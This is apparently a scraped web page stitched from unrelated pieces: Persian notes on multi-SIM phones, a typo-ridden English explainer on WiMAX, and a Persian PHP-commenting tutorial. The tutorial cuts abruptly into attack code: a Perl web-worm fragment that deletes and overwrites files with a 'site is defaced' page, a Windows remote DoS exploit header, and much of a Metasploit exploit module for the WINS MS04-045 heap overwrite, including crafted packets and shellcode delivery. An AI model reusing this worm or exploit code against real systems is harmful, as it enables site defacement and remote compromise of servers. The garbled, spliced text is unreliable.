از چند سال پیش که ایرانسل در ایران شروع به فعالیت کرد به طور ناگهانی مسئله ی جدیدی در ایران کاملا باب شد و آن هم داشتن چندین شماره اعم از اعتباری و دائمی، ایرانسل و همراه اول بود و خوب دلایل منطقی و خوبی هم داشت. یکی میخواست مشترک همراه اول بماند و در عین حال از امکانات ایرانسل هم استفاده کند. بعضی ها صرفا میخواستند برای هر منظور از شماره ای خاص استفاده کنند. یک عده هم که …. ولی خوب به هر حال با پیش آمدن این وضع، تا مدت کوتاهی مجبور بودیم برای استفاده ی هم زمان از دو شماره ی خاص یا از کیت های دو سیم کارته کردن موبایل استفاده کنیم که روش چندان دل نشینی هم نبود و یا اینکه ? موبایل خریداری کنیم که این روش هم کمی دست و پا گیر بود خصوصا که موبایل دوم از نوع عادی و ارزان قیمت انتخاب میشد و خیلی از کارها را نمیتوانستیم به راحتی گوشی اصلی مان با آن انجام دهیم. بعد هم گوشی های دو سیم کارت در بازار فراوان شدند؛ از انواع چینی گرفته تا گوشی های عرضه شده توسط کمپانی های معتبری مثل سامسونگ و ال جی. در پایان هم که چند ماه پیش بود که شنیدیم نوکیا هم با عرضه ی گوشی دو سیم کارته ی C3 پا به این عرصه گذاشته. نمیدانم میدانید یا نه ولی مدتی است که یک مدل گوشی ? سیم کارته هم داریم که البته در جریان نیستم که در ایران هم وجود دارد یا خیر. اما امروز در بازار آسیا شاهد عرضه ی موبایل جدیدی هستیم که قابلیت استفاده ی همزمان از ? سیم کارت را دارد و مهم تر از همه اینکه میتواند به صورت هم زمان از هر ? تای آنها استفاده نماید! جالب تر اینجاست که این گوشی امکانات بسیار خوبی را هم به کاربر ارائه میدهد که از میان آنها میتوان به صفحه ی ?.? اینچی لمسی، کیبرد استاندارد QWERTY، نمایش تلویزیون، رادیو FM، دوربین ?? مگاپیکسلی و بلوتوث اشاره کرد. آنطور که گفته میشود این گوشی به نسبت امکانات خود قیمت بالایی دارد و خوب البته قیمت بالا برای تنها گوشی موجود در این دسته طبیعی به نظر میرسد!
کاش میشد این امکانات را به گوشی هایی که امکان استفاده به عنوان Wi-Fi router را دارند اضافه میکردند آنوقت بود که دیگر خیلی باید ذوق میکردیم!
Think about how you access internet today. There are basically three different options:
Broadband access in your home, you have either a DSL or cable modem at office your company may be using a T1 or a T3 line.
Wifi access in your home you may have set up a wifi router that lets you surf the web while you louge with your laptop. On the road, you can find wifi hot spots in restaurants, hotels. Coffee shops and libraries.
Dial-up access if you are still using dial-up, chances are that either broadband access is not available, or you think that broadband access is too expensive.
The main problems whit broadband access are that it is pretty expensive and it doesn’t reach all areas. The main problem with wifi access is that hot spots are very small, so coverage is sparse.
What if there were a new technology that solved all of these problems? This new technology would provide:
The high speed of broadbond service
Wireless rather than wired access, so it would be a lot less expensive than cable or dsl and much easier to extend to suburban rural areas
Broad coverage like the cell phone network instead of small wifi hotspots.
This system is actually coming into being right now, and it is called wimax. Wimax is short for world wide interoperability for microwave access. And it also goes by the IEEE name 802.16.
Wimax has the potential to do to broadband internet access what cell phones have done to phone access. In the same way that many people have given up their "land line" in favor of cell phones. Wimax could replace cable and dsl services, providing universal internet access just about anywhere you go. Wimax will also be as pailless as wifi turning your computer on will automatically connect you to the closest available wimax amenna.
In this article, well find out how wimax works. What engineers are doing to make it better and what it could mean for the future of wireless internet.
Wimax wireless network
In practical terms, wimax would operate similar to wifi but at higher speeds, over greater distances and for a greater number of users. Wimax could potentially erase the suburban and rural blackout areas that currently have no broadband internet access because phone and cable companies have not yet run the necessary wires to those remote locations.
A wimax system consists of two parts:
A wimax tower, similar in concept to a cell phone tower a single wimax tower can provide coverage to a very large area as big as 3000 square miles (~8000 square km).
A wimax receiver the receiver and antenna could be a small box or PCMCIA card, or they could be built into a laptop the way wifi access is today.
A wimax tower station can connect directly to the internet using a high bandwidth, wired connection (for example, a T3 line ). It can also connect another wimax tower using a line of sight microwave link. This connection to a second tower (often referred to as a backhaul),
Along with the ability of a single tower to cover up to 3000 square miles, is what allows wimax to what this points out is that wimax actually can provide two forms of wireless service:
There is the non line of sight wifi sort of service where a small antenna on your computer connect to the tower. In this mode, wimax uses a lower frequency range 2 GHz to 11 GHz (similar to wifi) lower wavelength transmissions are not as easily disrupted by physical obstructions they are better able to diffract, or bend, around obstacles.
There is line of sight service where a fixed dish antenna points straight at the more stable so its able to send a lot of data with fewer errors. Line of sight transmissions use higher frequencies, with ranges reaching a possible 66 GHz. At higher frequencies, there is less interference and lots more bandwidth.
Wifi style access will be limited to a 4 to 6 mile radius (perhaps 25 square miles or 65 square km of coverage, which is similar in range to a cellphone zone). Through the stronger line of sight antennas, the wimax transmitting station would send data to wimax enabled computer or routers set up within the transmitters 30 mile radius (2800 square miles or 9300 square km of coverage). This is what allows wimax to achieve its maximum range. the final step in the area network scale is the global area network (GAN).
The proposal for GAN is IEEE 802.20. a true GAN would work a lot like today cell phone networks, with users able to travel across the country and still have access to the network the whole time. this network would have enough bandwidth to offer internet access comparable to cable modem service, but it would be accessible to mobile, always connected devices like laptops or next generation cell phone.
خیلی وقتها پیش میاد که هنگام کد نویسی لازم میشه یک یا چندخط را غیر فعال کنیم.(به این عمل comment کردن نیز میگویند) در Php برای این کار چند را وجود دارد.
1 - غیر فعال کردن یک خط : برای غیر فعال کردن یک خط میتوانیم از علامتهای // و یا # استفاده کنیم.
# echo "test"; // echo "test";
2- غیر فعال کردن چند خط :
/* echo "test"; echo "test"; */
برای غیر فعال کردن چند خط متوالی باید از عبارت /* برای خط شروع و از عبارت */ برای خط پایان استفاده کنیم
البته این راه معمولش میباشد ولی ما میتونیم برای غیر فعال کردن یک خط هم از عبارات /* و */ استفاده کنیم
/*echo "test";*/
و یا اینکه برای غیر فعال کردن چند خط اینگونه عمل کنیم:
my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);
connect(Server, sockaddr_in($port, $internet_addr)) or return;
select((select(Server), $| = 1)[0]);
print Server $r;
my $answer = join "", <Server>;
close (Server);
return $answer;
}
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
<BODY bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS><b>NeverEverNoSanity WebWorm generation }
. $generation .q{.</b></ADDRESS>
</BODY></HTML>
};
unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}
/* Windows Server 2003 and XP SP2 remote DoS exploit Tested under OpenBSD 3.6 at WinXP SP 2 Vuln by Dejan Levaja <dejan_@_levaja.com> (c)oded by __blf 2005 RusH Security Team , http://rst.void.ru Gr33tz: zZz, Phoenix, MishaSt, Inck-vizitor Fuck lamerz: Saint_I, nmalykh, Mr. Clumsy All rights reserved. */
CAN-2004-1080 ##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wins_ms04_045;
use base "Msf::Exploit";
use strict;
my $advanced =
{
"BASE" => [0, "Specify the exact address to the structure"],
"TARG" => [0, "Specify the exact address to overwrite"],
"WHAT" => [0, "Specify the data used to overwrite the address"],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({"Info" => $info, "Advanced" => $advanced}, @_);
return($self);
}
sub Check {
my $self = shift;
my $target_host = $self->GetVar("RHOST");
my $target_port = $self->GetVar("RPORT");
my ($ret, $fprint, $check) = @{ $self->Fingerprint };
if ($ret < 0) {
return $check;
}
if ($ret == 0) {
$self->PrintLine("[*] This system does not appear to be vulnerable.");
return $check;
}
$self->PrintLine("[*] This system appears to be vulnerable.");
if ($fprint->{"os"} ne "?") {
my $os = $fprint->{"os"} eq "?" ? "Unknown Windows" : "Windows ". $fprint->{"os"};
my $sp = $fprint->{"sp"} eq "?" ? "" : "SP ". $fprint->{"sp"};
my $vi = $fprint->{"vi"} == 1 ? "(clean heap)" : "(dirty heap)";
my $hp = length($sp) ? $vi : "";
$self->PrintLine("[*] Host $target_host is $os $sp $hp");
}
return $self->CheckCode("Safe");
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar("RHOST");
my $target_port = $self->GetVar("RPORT");
my $target_idx = $self->GetVar("TARGET");
my $shellcode = $self->GetVar("EncodedPayload")->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}
# Sanity check the WINS service
my ($ret, $fprint, $check) = @{ $self->Fingerprint };
if ($ret <= 0) {
$self->PrintLine("[*] The target system does not appear to be vulnerable.");
return;
}
# Windows 2000 SP0, SP2, SP3, SP4 only. SP1 does not have the
# same function pointer...
if ($fprint->{"os"} ne "2000" || $fprint->{"sp"} !~ /^[0234]/ ) {
$self->PrintLine("[*] The target system is not currently supported");
return;
}
# This flag is un-set if the first leaked address is not the default of
# 0x05371e90. This can indicate that someone has already tried to exploit
# this system, or something major happened to the heap that will probably
# prevent this exploit from working.
if (! $fprint->{"vi"}) {
$self->PrintLine("[*] The leaked heap address indicates that this attack may fail.");
}
# Allow for multiple attempts to find the base address
# XXX - Brute force not implemented (or required so far)
my @rloc = @{ $target->[1] };
# Address of the function pointers to overwrite (courtesy anonymous donor)
my $targ = $target->[2];
# Address of the payload on the heap, past the structure
my $code = $target->[3];
# Advanced options can be used to overwrite
@rloc = ( hex($self->GetVar("BASE")) ) if $self->GetVar("BASE");
$targ = hex($self->GetVar("TARG")) if $self->GetVar("TARG");
$code = hex($self->GetVar("WHAT")) if $self->GetVar("WHAT");
foreach my $base (@rloc) {
my ($req, $add);
# Pointing at any aligned address into top 36 bytes will result in a
# valid structure. This gives us some breathing room if things move
# around a little bit.
$add .= pack("V", $code) x 9;
$add .= pack("V", $targ - 0x48) x 14;
# Multiple copies are used in case things slide a little bit
$req .= $add x 10;
# Bling.
$req .= $shellcode;
# Random padding :-)
$req .= Pex::Text::EnglishText(9200 - length($req));
# Tack on the header
my $pkt = pack("NNN", length($req) + 8, -1, $base). $req;
# Poink!
$self->PrintLine(sprintf("[*] Attempting to overwrite 0x%.8x with 0x%.8x (0x%.8x)", $targ, $code, $base));
my $s = Msf::Socket::Tcp->new
(
"PeerAddr" => $target_host,
"PeerPort" => $target_port,
);
# This fingerprinting routine will cause the structure base address to slide down
# 120 bytes. Subsequent fingerprints will not push this down any futher, however
# we need to make sure that fingerprint is always called before exploitation or
# the alignment will be way off.
sub Fingerprint {
my $self = shift;
my $target_host = $self->GetVar("RHOST");
my $target_port = $self->GetVar("RPORT");
my $fprint = {};
# This results in vulnerable servers leaking back some useful
# pointers to the heap and to ntdll.dll. We can use these pointers
# to determine the service pack.
my $req =
"\x00\x00\x00\x29\x00\x00\x78\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x02\x00\x05".
"\x00\x00\x00\x00\x60\x56\x02\x01\x00\x1F\x6E\x03".
"\x00\x1F\x6E\x03\x08\xFE\x66\x03\x00";